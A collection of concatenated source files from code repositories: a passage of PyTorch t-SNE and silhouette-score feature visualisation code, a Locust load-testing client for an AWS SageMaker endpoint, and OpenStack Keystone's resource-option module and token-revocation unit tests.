subset = (len(dataloader) * subset) // batch_sizes[key]
subset = max(1, subset)
total_length = subset
path = root / 'data' / 'vis'
path.mkdir(exist_ok=True)
tsne = []
tsne_group = []
tsne_large = []
print("starting extraction")
with torch.no_grad():
for batch in tqdm(dataloader, total=subset):
batch = move_device(batch,
to=device)
vid, text = extract_reps(model, batch)
res, group, large_pool = get_tsne(vid, text, max_samples=None)
tsne = [*tsne, *res]
tsne_group = [*tsne_group, *group]
tsne_large.append(large_pool)
with open(path / f"{model_name}_single.pkl", 'wb') as f:
pickle.dump(tsne, f)
with open(path / f"{model_name}_group.pkl", 'wb') as f:
pickle.dump(tsne_group, f)
with open(path / f"{model_name}_large.pkl", 'wb') as f:
pickle.dump(tsne_large, f)
print("extraction done!")
def extract_reps(model, batch):
features, features_merged, keywords, G = model.prepare_group(batch)
hypo = batch.sentences
hypo = rearrange(hypo.contiguous(), 'b g l -> (b g) l')
h, inputs = transformer_embed(model.net.transformer, hypo,
skip_ids=[model.tokenizer.pad_id, model.tokenizer.sep_id],
infer=False)
return features_merged, h
def get_tsne(vid, text, max_samples=None):
# (b g) l c
vid = torch.cat(list(vid.values()), dim=1)
vid_length = vid.shape[1]
data = torch.cat((vid, text), dim=1)
pca = PCA(n_components=10)
tsne = TSNE(n_components=2, verbose=1, perplexity=40, n_iter=300)
res = []
group_pool = []
large_pools = []
if max_samples is None:
max_samples = data.shape[0] // 5
# assert max_samples <= data.shape[0], 'max_sample too large'
max_samples = min(max_samples, data.shape[0] // 5)
for i in tqdm(range(max_samples)):
group = []
'''
for j in tqdm(range(5)):
sample = data[i * 5 + j]
sample = sample.cpu()
sample = sample.numpy()
sample = pca.fit_transform(sample)
sample = tsne.fit_transform(sample)
# tsne = TSNE(n_components=2, perplexity=15, learning_rate=10).fit_transform(sample)
group.append((sample[:vid_length], sample[vid_length:]))
res.append(group)
'''
group_data = data[i * 5: i * 5 + 5]
g_vid = group_data[:, :vid_length].mean(dim=1) # 5C
g_text = group_data[:, vid_length:].mean(dim=1)
g_data = torch.cat((g_vid, g_text), dim=0).cpu().numpy()
g_data = pca.fit_transform(g_data)
g_data = tsne.fit_transform(g_data)
length = g_vid.shape[0]
group_pool.append([g_data[:length], g_data[length:]])
'''
sample_size = 20
for i in tqdm(range(data.shape[0] // sample_size)):
l_vid = data[sample_size * i : sample_size * (i+1), :vid_length].mean(dim=1) # 5C
l_text = data[sample_size * i : sample_size * (i+1), vid_length:].mean(dim=1)
l_data = torch.cat((l_vid, l_text), dim=0).cpu().numpy()
l_data = pca.fit_transform(l_data)
l_data = tsne.fit_transform(l_data)
length = l_vid.shape[0]
large_pool = [l_data[:length], l_data[length:]]
large_pools.append(large_pool)
'''
return res, group_pool, large_pools
@ex.capture
def _silhouette(model, loss_fn, optimizer, tokenizer, dataloaders, logger,
metrics, batch_sizes, device, reg_coeff, eval_metric, model_name,
root,
epoch=-1, subset=None, key=None, eval_generate=True,
eval_set=False, sample=False, concat_group=False,
use_vist=False):
if key is None:
key = 'val'
epoch_stats = defaultdict(float)
model.eval()
dataloader = dataloaders[key]
if subset is not None:
subset = (len(dataloader) * subset) // batch_sizes[key]
subset = max(1, subset)
total_length = subset
print("starting extraction")
vids = []
texts = []
count = 0
with torch.no_grad():
for batch in tqdm(dataloader, total=subset):
batch = move_device(batch,
to=device)
vid, text = extract_reps(model, batch)
vid = torch.cat(list(vid.values()), dim=1)
vid, text = get_random_feat(vid), get_random_feat(text)
vids.append(vid)
texts.append(text)
count += vid.shape[0]
if count >= 100:
break
vids = torch.cat(vids, dim=0)[:100]
texts = torch.cat(texts, dim=0)[:100]
data = torch.cat((vids, texts), dim=0).cpu().numpy()
idx = torch.cat((torch.zeros((100,)), torch.ones((100,))), dim=0).cpu().numpy()
print(data.shape, idx.shape)
score = silhouette_score(data, idx, metric='cosine')
print(f"silhouette_score: {score}")
def get_random_feat(feat):
# (BG) LC
feat = rearrange(feat, '(b g) l c -> b (g l) c', g=5)
idx = torch.randint(0, feat.shape[1], (feat.shape[0],)).to(feat.device)
feat = feat.gather(1, idx.view(-1, 1, 1).expand(feat.shape[0], 1, feat.shape[-1]))
return feat.squeeze(1)
``` |
{
"source": "jiwang576/locustio",
"score": 2
} |
#### File: examples/sagemaker/sagemaker_sdk_client.py
```python
from locust import events, HttpLocust, TaskSet, task
import boto3
import logging
import os
import time
endpoint_name = "CriteoXgboostBuiltin-2018-03-22-16-57-01"
task_name = "SagemMaker SDK Benchmark"
print("The botocore log level is: {}".format(logging.getLogger('botocore').level))
print("The botocore.vendored.requests.packages.urllib3.connectionpool log level is: {}".format(logging.getLogger('botocore.vendored.requests.packages.urllib3.connectionpool').level))
logging.getLogger('botocore').setLevel(logging.ERROR)
class SageMakerSdkClient(object):
def __init__(self):
self.runtime_client = boto3.client('runtime.sagemaker')
def get_time_for_prediction(self, runtime_client, endpoint_name, content_type, payload):
start_time = time.time()
response = self.runtime_client.invoke_endpoint(EndpointName=endpoint_name,
ContentType=content_type,
Body=payload)
end_time = time.time()
return (end_time - start_time) * 1000
def execute(self, name, endpoint_name, content_type, payload):
#runtime_client = boto3.client('runtime.sagemaker')
start_time = time.time()
try:
response_time = self.get_time_for_prediction(self.runtime_client, endpoint_name, content_type, payload)
events.request_success.fire(request_type="execute", name=name, response_time=response_time, response_length=0)
except Exception as e:
total_time = (time.time() - start_time) * 1000
events.request_failure.fire(request_type="execute", name=name, response_time=total_time, exception=e)
class UserTasks(TaskSet):
@task
def invocations(self):
fname = os.getcwd() + "/criteo_inference_data.csv"
with open(fname, 'rb') as f:
payload = f.read()
self.client.execute(name=task_name, endpoint_name=endpoint_name, content_type='text/csv', payload=payload)
class WebsiteUser(HttpLocust):
"""
Locust user class that does requests to the locust web server running on localhost
"""
host = "whatever. it's short circuited"
def __init__(self, *args, **kwargs):
super(WebsiteUser, self).__init__(*args, **kwargs)
self.client = SageMakerSdkClient()
min_wait = 200
max_wait = 200
task_set = UserTasks
``` |
{
"source": "jiwanlimbu/aura",
"score": 2
} |
#### File: keystone/common/resource_options.py
```python
import six
from keystone.common import validation
from keystone.i18n import _
def _validator(value):
return
def boolean_validator(value):
if value not in (True, False):
raise TypeError(_('Expected boolean value, got %r') % type(value))
def ref_mapper_to_dict_options(ref):
"""Convert the values in _resource_option_mapper to options dict.
NOTE: this is to be called from the relevant `to_dict` methods or
similar and must be called from within the active session context.
:param ref: the DB model ref to extract options from
:returns: Dict of options as expected to be returned out of to_dict in
the `options` key.
"""
options = {}
for opt in ref._resource_option_mapper.values():
if opt.option_id in ref.resource_options_registry.option_ids:
r_opt = ref.resource_options_registry.get_option_by_id(
opt.option_id)
if r_opt is not None:
options[r_opt.option_name] = opt.option_value
return options
def resource_options_ref_to_mapper(ref, option_class):
"""Convert the _resource_options property-dict to options attr map.
The model must have the resource option mapper located in the
``_resource_option_mapper`` attribute.
The model must have the resource option registry located in the
``resource_options_registry` attribute.
The option dict with key(opt_id), value(opt_value) will be pulled from
``ref._resource_options``.
NOTE: This function MUST be called within the active writer session
context!
:param ref: The DB model reference that is actually stored to the
backend.
:param option_class: Class that is used to store the resource option
in the DB.
"""
options = getattr(ref, '_resource_options', None)
if options is not None:
# To ensure everything is clean, no lingering refs.
delattr(ref, '_resource_options')
else:
# _resource_options didn't exist. Work from an empty set.
options = {}
# NOTE(notmorgan): explicitly use .keys() here as the attribute mapper
# has some oddities at times. This guarantees we are working with keys.
set_options = set(ref._resource_option_mapper.keys())
# Get any options that are not registered and slate them for removal from
# the DB. This will delete unregistered options.
clear_options = set_options.difference(
ref.resource_options_registry.option_ids)
options.update({x: None for x in clear_options})
# Set the resource options for user in the Attribute Mapping.
for r_opt_id, r_opt_value in options.items():
if r_opt_value is None:
# Delete any option set explicitly to None, ignore unset
# options.
ref._resource_option_mapper.pop(r_opt_id, None)
else:
# Set any options on the user_ref itself.
opt_obj = option_class(
option_id=r_opt_id,
option_value=r_opt_value)
ref._resource_option_mapper[r_opt_id] = opt_obj
class ResourceOptionRegistry(object):
def __init__(self, registry_name):
self._registered_options = {}
self._registry_type = registry_name
@property
def option_names(self):
return set([opt.option_name for opt in self.options])
@property
def options_by_name(self):
return {opt.option_name: opt
for opt in self._registered_options.values()}
@property
def options(self):
return self._registered_options.values()
@property
def option_ids(self):
return set(self._registered_options.keys())
def get_option_by_id(self, opt_id):
return self._registered_options.get(opt_id, None)
def get_option_by_name(self, name):
for option in self._registered_options.values():
if name == option.option_name:
return option
return None
@property
def json_schema(self):
schema = {'type': 'object',
'properties': {},
'additionalProperties': False}
for opt in self.options:
if opt.json_schema is not None:
# NOTE(notmorgan): All options are nullable. Null indicates
# the option should be reset and removed from the DB store.
schema['properties'][opt.option_name] = validation.nullable(
opt.json_schema)
else:
# NOTE(notmorgan): without 'type' being specified, this
# can be of any-type. We are simply specifying no interesting
# values beyond that the property may exist here.
schema['properties'][opt.option_name] = {}
return schema
def register_option(self, option):
if option in self.options:
# Re-registering the exact same option does nothing.
return
if option.option_id in self._registered_options:
raise ValueError(_('Option %(option_id)s already defined in '
'%(registry)s.') %
{'option_id': option.option_id,
'registry': self._registry_type})
if option.option_name in self.option_names:
raise ValueError(_('Option %(option_name)s already defined in '
'%(registry)s') %
{'option_name': option.option_name,
'registry': self._registry_type})
self._registered_options[option.option_id] = option
class ResourceOption(object):
def __init__(self, option_id, option_name, validator=_validator,
json_schema_validation=None):
"""The base object to define the option(s) to be stored in the DB.
:param option_id: The ID of the option. This will be used to lookup
the option value from the DB and should not be
changed once defined as the values will no longer
be correctly mapped to the keys in the user_ref when
retrieving the data from the DB.
:type option_id: str
:param option_name: The name of the option. This value will be used
to map the value from the user request on a
resource update to the correct option id to be
stored in the database. This value should not be
changed once defined as it will change the
resulting keys in the user_ref.
:type option_name: str
:param validator: A callable that raises TypeError if the value to be
persisted is incorrect. A single argument of the
value to be persisted will be passed to it. No return
value is expected.
:type validator: callable
:param json_schema_validation: Dictionary defining the JSON schema
validation for the option itself. This
is used to generate the JSON Schema
validator(s) used at the API layer
:type json_schema_validation: dict
"""
if not isinstance(option_id, six.string_types) and len(option_id) == 4:
raise TypeError(_('`option_id` must be a string, got %r')
% option_id)
elif len(option_id) != 4:
raise ValueError(_('`option_id` must be 4 characters in '
'length. Got %r') % option_id)
if not isinstance(option_name, six.string_types):
raise TypeError(_('`option_name` must be a string. '
'Got %r') % option_name)
self._option_id = option_id
self._option_name = option_name
self.validator = validator
self._json_schema_validation = json_schema_validation
@property
def json_schema(self):
return self._json_schema_validation or None
@property
def option_name(self):
# NOTE(notmorgan) Option IDs should never be set outside of definition
# time.
return self._option_name
@property
def option_id(self):
# NOTE(notmorgan) Option IDs should never be set outside of definition
# time.
return self._option_id
```
#### File: tests/unit/test_revoke.py
```python
import datetime
import uuid
import mock
from oslo_utils import timeutils
from six.moves import range
from testtools import matchers
from keystone.common import utils
import keystone.conf
from keystone import exception
from keystone.models import revoke_model
from keystone.revoke.backends import sql
from keystone.tests import unit
from keystone.tests.unit import ksfixtures
from keystone.tests.unit import test_backend_sql
from keystone.token.providers import common
CONF = keystone.conf.CONF
def _future_time():
expire_delta = datetime.timedelta(seconds=1000)
future_time = timeutils.utcnow() + expire_delta
return future_time
def _past_time():
expire_delta = datetime.timedelta(days=-1000)
past_time = timeutils.utcnow() + expire_delta
return past_time
def _sample_blank_token():
issued_delta = datetime.timedelta(minutes=-2)
issued_at = timeutils.utcnow() + issued_delta
token_data = revoke_model.blank_token_data(issued_at)
return token_data
def _sample_data():
user_ids = []
project_ids = []
role_ids = []
for i in range(0, 3):
user_ids.append(uuid.uuid4().hex)
project_ids.append(uuid.uuid4().hex)
role_ids.append(uuid.uuid4().hex)
# For testing purposes, create 3 project tokens with a different user_id,
# role_id, and project_id which will be used to verify that revoking by
# grant on certain user_id, project_id, and role_id pairs leaves these
# project_tokens unrevoked if only one of the revoked columns are matched
# but not all of them as the expected behavior dictates
project_tokens = []
i = len(project_tokens)
project_tokens.append(_sample_blank_token())
project_tokens[i]['user_id'] = user_ids[1]
project_tokens[i]['project_id'] = project_ids[0]
project_tokens[i]['roles'] = [role_ids[0]]
i = len(project_tokens)
project_tokens.append(_sample_blank_token())
project_tokens[i]['user_id'] = user_ids[0]
project_tokens[i]['project_id'] = project_ids[1]
project_tokens[i]['roles'] = [role_ids[0]]
i = len(project_tokens)
project_tokens.append(_sample_blank_token())
project_tokens[i]['user_id'] = user_ids[0]
project_tokens[i]['project_id'] = project_ids[0]
project_tokens[i]['roles'] = [role_ids[1]]
return user_ids, project_ids, role_ids, project_tokens
def _matches(event, token_values):
"""See if the token matches the revocation event.
Used as a secondary check on the logic to Check
By Tree Below: This is abrute force approach to checking.
Compare each attribute from the event with the corresponding
value from the token. If the event does not have a value for
the attribute, a match is still possible. If the event has a
value for the attribute, and it does not match the token, no match
is possible, so skip the remaining checks.
:param event: one revocation event to match
:param token_values: dictionary with set of values taken from the
token
:returns: True if the token matches the revocation event, indicating the
token has been revoked
"""
# The token has three attributes that can match the user_id
if event.user_id is not None:
for attribute_name in ['user_id', 'trustor_id', 'trustee_id']:
if event.user_id == token_values[attribute_name]:
break
else:
return False
# The token has two attributes that can match the domain_id
if event.domain_id is not None:
for attribute_name in ['identity_domain_id', 'assignment_domain_id']:
if event.domain_id == token_values[attribute_name]:
break
else:
return False
if event.domain_scope_id is not None:
if event.domain_scope_id != token_values['assignment_domain_id']:
return False
# If any one check does not match, the while token does
# not match the event. The numerous return False indicate
# that the token is still valid and short-circuits the
# rest of the logic.
attribute_names = ['project_id',
'expires_at', 'trust_id', 'consumer_id',
'access_token_id', 'audit_id', 'audit_chain_id']
for attribute_name in attribute_names:
if getattr(event, attribute_name) is not None:
if (getattr(event, attribute_name) !=
token_values[attribute_name]):
return False
if event.role_id is not None:
roles = token_values['roles']
for role in roles:
if event.role_id == role:
break
else:
return False
if token_values['issued_at'] > event.issued_before:
return False
return True
class RevokeTests(object):
def _assertTokenRevoked(self, events, token_data):
backend = sql.Revoke()
if events:
self.assertTrue(revoke_model.is_revoked(events, token_data),
'Token should be revoked')
return self.assertTrue(
revoke_model.is_revoked(backend.list_events(token=token_data),
token_data), 'Token should be revoked')
def _assertTokenNotRevoked(self, events, token_data):
backend = sql.Revoke()
if events:
self.assertTrue(revoke_model.is_revoked(events, token_data),
'Token should be revoked')
return self.assertFalse(
revoke_model.is_revoked(backend.list_events(token=token_data),
token_data), 'Token should not be revoked')
def test_list(self):
self.revoke_api.revoke_by_user(user_id=1)
self.assertEqual(1, len(self.revoke_api.list_events()))
self.revoke_api.revoke_by_user(user_id=2)
self.assertEqual(2, len(self.revoke_api.list_events()))
def test_list_since(self):
self.revoke_api.revoke_by_user(user_id=1)
self.revoke_api.revoke_by_user(user_id=2)
past = timeutils.utcnow() - datetime.timedelta(seconds=1000)
self.assertEqual(2, len(self.revoke_api.list_events(last_fetch=past)))
future = timeutils.utcnow() + datetime.timedelta(seconds=1000)
self.assertEqual(0,
len(self.revoke_api.list_events(last_fetch=future)))
def test_list_revoked_user(self):
revocation_backend = sql.Revoke()
events = []
# This simulates creating a token for a specific user. When we revoke
# the token we should have a single revocation event in the list. We
# are going to assert that the token values match the only revocation
# event in the backend.
first_token = _sample_blank_token()
first_token['user_id'] = uuid.uuid4().hex
add_event(
events, revoke_model.RevokeEvent(user_id=first_token['user_id'])
)
self.revoke_api.revoke_by_user(user_id=first_token['user_id'])
self._assertTokenRevoked(events, first_token)
self.assertEqual(
1, len(revocation_backend.list_events(token=first_token))
)
# This simulates creating a separate token for a separate user. We are
# going to revoke the token just like we did for the previous token.
# We should have two revocation events stored in the backend but only
# one should match the values of the second token.
second_token = _sample_blank_token()
second_token['user_id'] = uuid.uuid4().hex
add_event(
events, revoke_model.RevokeEvent(user_id=second_token['user_id'])
)
self.revoke_api.revoke_by_user(user_id=second_token['user_id'])
self._assertTokenRevoked(events, second_token)
self.assertEqual(
1, len(revocation_backend.list_events(token=second_token))
)
# This simulates creating another separate token for a separate user,
# but we're not going to issue a revocation event. Even though we have
# two revocation events persisted in the backend, neither of them
# should match the values of the third token. If they did - our
# revocation event matching would be too heavy handed, which would
# result in over-generalized revocation patterns.
third_token = _sample_blank_token()
third_token['user_id'] = uuid.uuid4().hex
self._assertTokenNotRevoked(events, third_token)
self.assertEqual(
0, len(revocation_backend.list_events(token=third_token))
)
# This gets a token but overrides the user_id of the token to be None.
# Technically this should never happen because tokens must belong to
# a user. What we're testing here is that the two revocation events
# we've created won't match None values for the user_id.
fourth_token = _sample_blank_token()
fourth_token['user_id'] = None
self._assertTokenNotRevoked(events, fourth_token)
self.assertEqual(
0, len(revocation_backend.list_events(token=fourth_token))
)
def test_list_revoked_project(self):
revocation_backend = sql.Revoke()
events = []
token = _sample_blank_token()
# Create a token for a project, revoke token, check the token we
# created has been revoked, and check the list returned a match for
# the token when passed in.
first_token = _sample_blank_token()
first_token['project_id'] = uuid.uuid4().hex
add_event(events, revoke_model.RevokeEvent(
project_id=first_token['project_id']))
revocation_backend.revoke(revoke_model.RevokeEvent(
project_id=first_token['project_id']))
self._assertTokenRevoked(events, first_token)
self.assertEqual(1, len(revocation_backend.list_events(
token=first_token)))
# Create a second token, revoke it, check the token has been revoked,
# and check the list to make sure that even though we now have 2
# revoked events in the revocation list, it will only return 1 because
# only one match for our second_token should exist
second_token = _sample_blank_token()
second_token['project_id'] = uuid.uuid4().hex
add_event(events, revoke_model.RevokeEvent(
project_id=second_token['project_id']))
revocation_backend.revoke(revoke_model.RevokeEvent(
project_id=second_token['project_id']))
self._assertTokenRevoked(events, second_token)
self.assertEqual(
1, len(revocation_backend.list_events(token=second_token)))
# This gets a token but overrides project_id of the token to be None.
# We expect that since there are two events which both have populated
# project_ids, this should not match this third_token with any other
# event in the list so we should receive 0.
third_token = _sample_blank_token()
third_token['project_id'] = None
self._assertTokenNotRevoked(events, token)
self.assertEqual(0, len(revocation_backend.list_events(token=token)))
def test_list_revoked_audit(self):
revocation_backend = sql.Revoke()
events = []
# Create a token with audit_id set, revoke it, check it is revoked,
# check to make sure that list_events matches the token to the event we
# just revoked.
first_token = _sample_blank_token()
first_token['audit_id'] = common.random_urlsafe_str()
add_event(events, revoke_model.RevokeEvent(
audit_id=first_token['audit_id']))
self.revoke_api.revoke_by_audit_id(
audit_id=first_token['audit_id'])
self._assertTokenRevoked(events, first_token)
self.assertEqual(
1, len(revocation_backend.list_events(token=first_token)))
# Create a second token, revoke it, check it is revoked, check to make
# sure that list events only finds 1 match since there are 2 and they
# dont both have different populated audit_id fields
second_token = _sample_blank_token()
second_token['audit_id'] = common.random_urlsafe_str()
add_event(events, revoke_model.RevokeEvent(
audit_id=second_token['audit_id']))
self.revoke_api.revoke_by_audit_id(
audit_id=second_token['audit_id'])
self._assertTokenRevoked(events, second_token)
self.assertEqual(
1, len(revocation_backend.list_events(token=second_token)))
# Create a third token with audit_id set to None to make sure that
# since there are no events currently revoked with audit_id None this
# finds no matches
third_token = _sample_blank_token()
third_token['audit_id'] = None
self._assertTokenNotRevoked(events, third_token)
self.assertEqual(
0, len(revocation_backend.list_events(token=third_token)))
def test_list_revoked_since(self):
revocation_backend = sql.Revoke()
token = _sample_blank_token()
self.revoke_api.revoke_by_user(user_id=None)
self.revoke_api.revoke_by_user(user_id=None)
self.assertEqual(2, len(revocation_backend.list_events(token=token)))
future = timeutils.utcnow() + datetime.timedelta(seconds=1000)
token['issued_at'] = future
self.assertEqual(0, len(revocation_backend.list_events(token=token)))
def test_list_revoked_multiple_filters(self):
revocation_backend = sql.Revoke()
events = []
# create token that sets key/value filters in list_revoked
first_token = _sample_blank_token()
first_token['user_id'] = uuid.uuid4().hex
first_token['project_id'] = uuid.uuid4().hex
first_token['audit_id'] = common.random_urlsafe_str()
# revoke event and then verify that that there is only one revocation
# and verify the only revoked event is the token
add_event(events, revoke_model.RevokeEvent(
user_id=first_token['user_id'],
project_id=first_token['project_id'],
audit_id=first_token['audit_id']))
self.revoke_api.revoke(revoke_model.RevokeEvent(
user_id=first_token['user_id'],
project_id=first_token['project_id'],
audit_id=first_token['audit_id']))
self._assertTokenRevoked(events, first_token)
self.assertEqual(
1, len(revocation_backend.list_events(token=first_token)))
# If a token has None values which the event contains it shouldn't
# match and not be revoked
second_token = _sample_blank_token()
self._assertTokenNotRevoked(events, second_token)
self.assertEqual(
0, len(revocation_backend.list_events(token=second_token)))
# If an event column and corresponding dict value don't match, Then
# it should not add the event in the list. Demonstrate for project
third_token = _sample_blank_token()
third_token['project_id'] = uuid.uuid4().hex
self._assertTokenNotRevoked(events, third_token)
self.assertEqual(
0, len(revocation_backend.list_events(token=third_token)))
# A revoked event with user_id as null and token user_id non null
# should still be return an event and be revoked if other non null
# event fields match non null token fields
fourth_token = _sample_blank_token()
fourth_token['user_id'] = uuid.uuid4().hex
fourth_token['project_id'] = uuid.uuid4().hex
fourth_token['audit_id'] = common.random_urlsafe_str()
add_event(events, revoke_model.RevokeEvent(
project_id=fourth_token['project_id'],
audit_id=fourth_token['audit_id']))
self.revoke_api.revoke(revoke_model.RevokeEvent(
project_id=fourth_token['project_id'],
audit_id=fourth_token['audit_id']))
self._assertTokenRevoked(events, fourth_token)
self.assertEqual(
1, len(revocation_backend.list_events(token=fourth_token)))
def _user_field_test(self, field_name):
token = _sample_blank_token()
token[field_name] = uuid.uuid4().hex
self.revoke_api.revoke_by_user(user_id=token[field_name])
self._assertTokenRevoked(None, token)
token2 = _sample_blank_token()
token2[field_name] = uuid.uuid4().hex
self._assertTokenNotRevoked(None, token2)
def test_revoke_by_user(self):
self._user_field_test('user_id')
def test_revoke_by_user_matches_trustee(self):
self._user_field_test('trustee_id')
def test_revoke_by_user_matches_trustor(self):
self._user_field_test('trustor_id')
def test_revoke_by_audit_id(self):
token = _sample_blank_token()
# Audit ID and Audit Chain ID are populated with the same value
# if the token is an original token
token['audit_id'] = uuid.uuid4().hex
token['audit_chain_id'] = token['audit_id']
self.revoke_api.revoke_by_audit_id(audit_id=token['audit_id'])
self._assertTokenRevoked(None, token)
token2 = _sample_blank_token()
token2['audit_id'] = uuid.uuid4().hex
token2['audit_chain_id'] = token2['audit_id']
self._assertTokenNotRevoked(None, token2)
def test_by_project_grant(self):
user_ids, project_ids, role_ids, project_tokens = _sample_data()
token1 = _sample_blank_token()
token1['roles'] = role_ids[0]
token1['user_id'] = user_ids[0]
token1['project_id'] = project_ids[0]
token2 = _sample_blank_token()
token2['roles'] = role_ids[1]
token2['user_id'] = user_ids[1]
token2['project_id'] = project_ids[1]
token3 = _sample_blank_token()
token3['roles'] = [role_ids[0],
role_ids[1],
role_ids[2]]
token3['user_id'] = user_ids[2]
token3['project_id'] = project_ids[2]
# Check that all tokens are revoked at the start
self._assertTokenNotRevoked(None, token1)
self._assertTokenNotRevoked(None, token2)
self._assertTokenNotRevoked(None, token3)
for token in project_tokens:
self._assertTokenNotRevoked(None, token)
self.revoke_api.revoke_by_grant(role_id=role_ids[0],
user_id=user_ids[0],
project_id=project_ids[0])
# Only the first token should be revoked
self._assertTokenRevoked(None, token1)
self._assertTokenNotRevoked(None, token2)
self._assertTokenNotRevoked(None, token3)
for token in project_tokens:
self._assertTokenNotRevoked(None, token)
self.revoke_api.revoke_by_grant(role_id=role_ids[1],
user_id=user_ids[1],
project_id=project_ids[1])
# Tokens 1 and 2 should be revoked now
self._assertTokenRevoked(None, token1)
self._assertTokenRevoked(None, token2)
self._assertTokenNotRevoked(None, token3)
for token in project_tokens:
self._assertTokenNotRevoked(None, token)
# test that multiple roles with a single user and project get revoked
# and invalidate token3
self.revoke_api.revoke_by_grant(role_id=role_ids[0],
user_id=user_ids[2],
project_id=project_ids[2])
self.revoke_api.revoke_by_grant(role_id=role_ids[1],
user_id=user_ids[2],
project_id=project_ids[2])
self.revoke_api.revoke_by_grant(role_id=role_ids[2],
user_id=user_ids[2],
project_id=project_ids[2])
# Tokens 1, 2, and 3 should now be revoked leaving project_tokens
# unrevoked.
self._assertTokenRevoked(None, token1)
self._assertTokenRevoked(None, token2)
self._assertTokenRevoked(None, token3)
for token in project_tokens:
self._assertTokenNotRevoked(None, token)
@mock.patch.object(timeutils, 'utcnow')
def test_expired_events_are_removed(self, mock_utcnow):
def _sample_token_values():
token = _sample_blank_token()
token['expires_at'] = utils.isotime(_future_time(),
subsecond=True)
return token
now = datetime.datetime.utcnow()
now_plus_2h = now + datetime.timedelta(hours=2)
mock_utcnow.return_value = now
# Build a token and validate it. This will seed the cache for the
# future 'synchronize' call.
token_values = _sample_token_values()
audit_chain_id = uuid.uuid4().hex
self.revoke_api.revoke_by_audit_chain_id(audit_chain_id)
token_values['audit_chain_id'] = audit_chain_id
self.assertRaises(exception.TokenNotFound,
self.revoke_api.check_token,
token_values)
# Move our clock forward by 2h, build a new token and validate it.
# 'synchronize' should now be exercised and remove old expired events
mock_utcnow.return_value = now_plus_2h
self.revoke_api.revoke_by_audit_chain_id(audit_chain_id)
# two hours later, it should still be not found
self.assertRaises(exception.TokenNotFound,
self.revoke_api.check_token,
token_values)
def test_delete_group_without_role_does_not_revoke_users(self):
revocation_backend = sql.Revoke()
domain = unit.new_domain_ref()
self.resource_api.create_domain(domain['id'], domain)
# Create two groups. Group1 will be used to test deleting a group,
# without role assignments and users in the group, doesn't create
# revoked events. Group2 will show that deleting a group with role
# assignment and users in the group does create revoked events
group1 = unit.new_group_ref(domain_id=domain['id'])
group1 = self.identity_api.create_group(group1)
group2 = unit.new_group_ref(domain_id=domain['id'])
group2 = self.identity_api.create_group(group2)
role = unit.new_role_ref()
self.role_api.create_role(role['id'], role)
user1 = unit.new_user_ref(domain_id=domain['id'])
user1 = self.identity_api.create_user(user1)
user2 = unit.new_user_ref(domain_id=domain['id'])
user2 = self.identity_api.create_user(user2)
# Add two users to the group, verify they are added, delete group, and
# check that the revocaiton events have not been created
self.identity_api.add_user_to_group(user_id=user1['id'],
group_id=group1['id'])
self.identity_api.add_user_to_group(user_id=user2['id'],
group_id=group1['id'])
self.assertEqual(
2, len(self.identity_api.list_users_in_group(group1['id'])))
self.identity_api.delete_group(group1['id'])
self.assertEqual(0, len(revocation_backend.list_events()))
# Assign a role to the group, add two users to the group, verify that
# the role has been assigned to the group, verify the users have been
# added to the group, delete the group, check that the revocation
# events have been created
self.assignment_api.create_grant(group_id=group2['id'],
domain_id=domain['id'],
role_id=role['id'])
grants = self.assignment_api.list_role_assignments(role_id=role['id'])
self.assertThat(grants, matchers.HasLength(1))
self.identity_api.add_user_to_group(user_id=user1['id'],
group_id=group2['id'])
self.identity_api.add_user_to_group(user_id=user2['id'],
group_id=group2['id'])
self.assertEqual(
2, len(self.identity_api.list_users_in_group(group2['id'])))
self.identity_api.delete_group(group2['id'])
self.assertEqual(2, len(revocation_backend.list_events()))
class UUIDSqlRevokeTests(test_backend_sql.SqlTests, RevokeTests):
def config_overrides(self):
super(UUIDSqlRevokeTests, self).config_overrides()
self.config_fixture.config(
group='token',
provider='uuid',
revoke_by_id=False)
class FernetSqlRevokeTests(test_backend_sql.SqlTests, RevokeTests):
def config_overrides(self):
super(FernetSqlRevokeTests, self).config_overrides()
self.config_fixture.config(
group='token',
provider='fernet',
revoke_by_id=False)
self.useFixture(
ksfixtures.KeyRepository(
self.config_fixture,
'fernet_tokens',
CONF.fernet_tokens.max_active_keys
)
)
def add_event(events, event):
events.append(event)
return event
def remove_event(events, event):
for target in events:
if target == event:
events.remove(target)
class RevokeListTests(unit.TestCase):
def setUp(self):
super(RevokeListTests, self).setUp()
self.events = []
self.revoke_events = list()
def _assertTokenRevoked(self, token_data):
self.assertTrue(any([_matches(e, token_data) for e in self.events]))
return self.assertTrue(
revoke_model.is_revoked(self.revoke_events, token_data),
'Token should be revoked')
def _assertTokenNotRevoked(self, token_data):
self.assertFalse(any([_matches(e, token_data) for e in self.events]))
return self.assertFalse(
revoke_model.is_revoked(self.revoke_events, token_data),
'Token should not be revoked')
def _revoke_by_user(self, user_id):
return add_event(
self.revoke_events,
revoke_model.RevokeEvent(user_id=user_id))
def _revoke_by_audit_chain_id(self, audit_chain_id, project_id=None,
domain_id=None):
event = add_event(
self.revoke_events,
revoke_model.RevokeEvent(audit_chain_id=audit_chain_id,
project_id=project_id,
domain_id=domain_id)
)
self.events.append(event)
return event
def _revoke_by_expiration(self, user_id, expires_at, project_id=None,
domain_id=None):
event = add_event(
self.revoke_events,
revoke_model.RevokeEvent(user_id=user_id,
expires_at=expires_at,
project_id=project_id,
domain_id=domain_id))
self.events.append(event)
return event
def _revoke_by_user_and_project(self, user_id, project_id):
event = add_event(self.revoke_events,
revoke_model.RevokeEvent(project_id=project_id,
user_id=user_id))
self.events.append(event)
return event
def _revoke_by_project_role_assignment(self, project_id, role_id):
event = add_event(self.revoke_events,
revoke_model.RevokeEvent(project_id=project_id,
role_id=role_id))
self.events.append(event)
return event
def _revoke_by_domain_role_assignment(self, domain_id, role_id):
event = add_event(self.revoke_events,
revoke_model.RevokeEvent(domain_id=domain_id,
role_id=role_id))
self.events.append(event)
return event
def _revoke_by_domain(self, domain_id):
event = add_event(self.revoke_events,
revoke_model.RevokeEvent(domain_id=domain_id))
self.events.append(event)
def test_revoke_by_audit_chain_id(self):
audit_id = common.build_audit_info(parent_audit_id=None)[0]
token_data_1 = _sample_blank_token()
# Audit ID and Audit Chain ID are populated with the same value
# if the token is an original token
token_data_1['audit_id'] = audit_id
token_data_1['audit_chain_id'] = audit_id
event = self._revoke_by_audit_chain_id(audit_id)
self._assertTokenRevoked(token_data_1)
audit_id_2 = common.build_audit_info(parent_audit_id=audit_id)[0]
token_data_2 = _sample_blank_token()
token_data_2['audit_id'] = audit_id_2
token_data_2['audit_chain_id'] = audit_id
self._assertTokenRevoked(token_data_2)
self.remove_event(event)
